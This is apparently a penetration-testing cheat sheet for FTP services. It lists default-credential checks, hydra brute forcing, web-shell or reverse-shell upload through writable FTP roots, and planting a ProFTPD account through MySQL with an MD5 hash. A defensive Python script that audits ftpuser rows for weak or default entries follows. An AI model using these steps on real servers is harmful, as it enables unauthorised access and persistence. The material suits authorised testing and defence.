Common Tests
| Command/Actions | Description |
|---|---|
| ftp://ip:21 | Check for Web Directory Listing |
| anonymous:anonymous, admin:admin, root:root | Check for anonymous access and default/weak credentials |
| wget -m ftp://anonymous:anonymous@ip | Download files from FTP Directory using Wget |
| ftp > get file.txt | Download files using FTP client |
| PUT Allowed | Attempt to upload Reverse Shell / Web Shell |
| hydra -C /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.xxx.xx ftp | Bruteforce Attack |
Food for Thought
1. Have you tried any default credentials (may be specific to FTP version)?
   - admin:admin
   - root:root
   - ftp:ftp
   - user:system
2. What does the ftproot suggest?
   In some cases the FTP root is also a web server directory, so a file uploaded over FTP can trigger a web shell when it is requested through the web application, for example:
   https://ip/webshell.txt
3. When transferring files, remember to use binary mode
Proftpd
1. Default path of Proftpd
   /etc/proftpd
2. If you have obtained access to the MySQL database used by Proftpd, it may be possible to gain FTP access by creating a Proftpd user via MySQL
Create the password:
Make sure the quotes around the password are straight quotes ("), not curly quotes
/bin/echo "{md5}"$(/bin/echo -n "pwned" | openssl dgst -binary -md5 | openssl enc -base64)
Insert the record:
INSERT INTO ftpuser (id, userid, passwd, uid, gid, homedir, shell, count, accessed, modified) VALUES (NULL, 'benoit', '{md5}F5rUXGziy5fPECniEgRugQ==', '1000', '1000', '/', '/bin/bash', '0', '2022-09-27 05:26:29', '2022-09-27 05:26:29');
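
Seen from the defending side, rows like the one above can be audited in the same table. The following Python sketch is an added example, not part of the original page or of ProFTPD: it flags `ftpuser` rows that store an unsalted `{md5}` value, match one of the default passwords listed earlier, use `/` as home directory, or carry UID/GID 0. The helper names (`md5_tag`, `audit_row`, `audit_table`) are hypothetical, and the sample rows are constructed, with dictionary keys assumed to follow the INSERT column names.

```python
import base64
import hashlib

# Default passwords taken from the credential pairs listed on this page.
DEFAULT_PASSWORDS = ["anonymous", "admin", "root", "ftp", "system"]


def md5_tag(password: str) -> str:
    """Return '{md5}' + base64(MD5(password)), the format the openssl pipeline emits."""
    digest = hashlib.md5(password.encode("utf-8")).digest()
    return "{md5}" + base64.b64encode(digest).decode("ascii")


KNOWN_WEAK = {md5_tag(p): p for p in DEFAULT_PASSWORDS}


def audit_row(row: dict) -> list:
    """Return the findings for one ftpuser row (keys follow the INSERT columns)."""
    findings = []
    passwd = row["passwd"]
    if passwd.startswith("{md5}"):
        # Unsalted MD5: identical passwords give identical, precomputable values.
        findings.append("unsalted-md5")
    if passwd in KNOWN_WEAK:
        findings.append("default-password")
    if row["homedir"] == "/":
        findings.append("homedir-is-filesystem-root")
    if int(row["uid"]) == 0 or int(row["gid"]) == 0:
        findings.append("uid-or-gid-zero")
    return findings


def audit_table(rows: list) -> dict:
    """Map userid -> findings, keeping only rows that have at least one finding."""
    report = {}
    for row in rows:
        findings = audit_row(row)
        if findings:
            report[row["userid"]] = findings
    return report


# Constructed sample rows; only 'benoit' reuses values shown in the INSERT above.
SAMPLE_ROWS = [
    {"userid": "benoit", "passwd": "{md5}F5rUXGziy5fPECniEgRugQ==", "uid": "1000", "gid": "1000", "homedir": "/"},
    {"userid": "backup", "passwd": md5_tag("admin"), "uid": "0", "gid": "0", "homedir": "/srv/ftp/backup"},
    {"userid": "alice", "passwd": "$6$constructedsalt$constructedhash", "uid": "2001", "gid": "2001", "homedir": "/srv/ftp/alice"},
]

if __name__ == "__main__":
    for user, findings in audit_table(SAMPLE_ROWS).items():
        print(user, findings)
```

In practice the rows would come from a read-only query against the authentication database, and any finding is a prompt to review how that account was provisioned.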
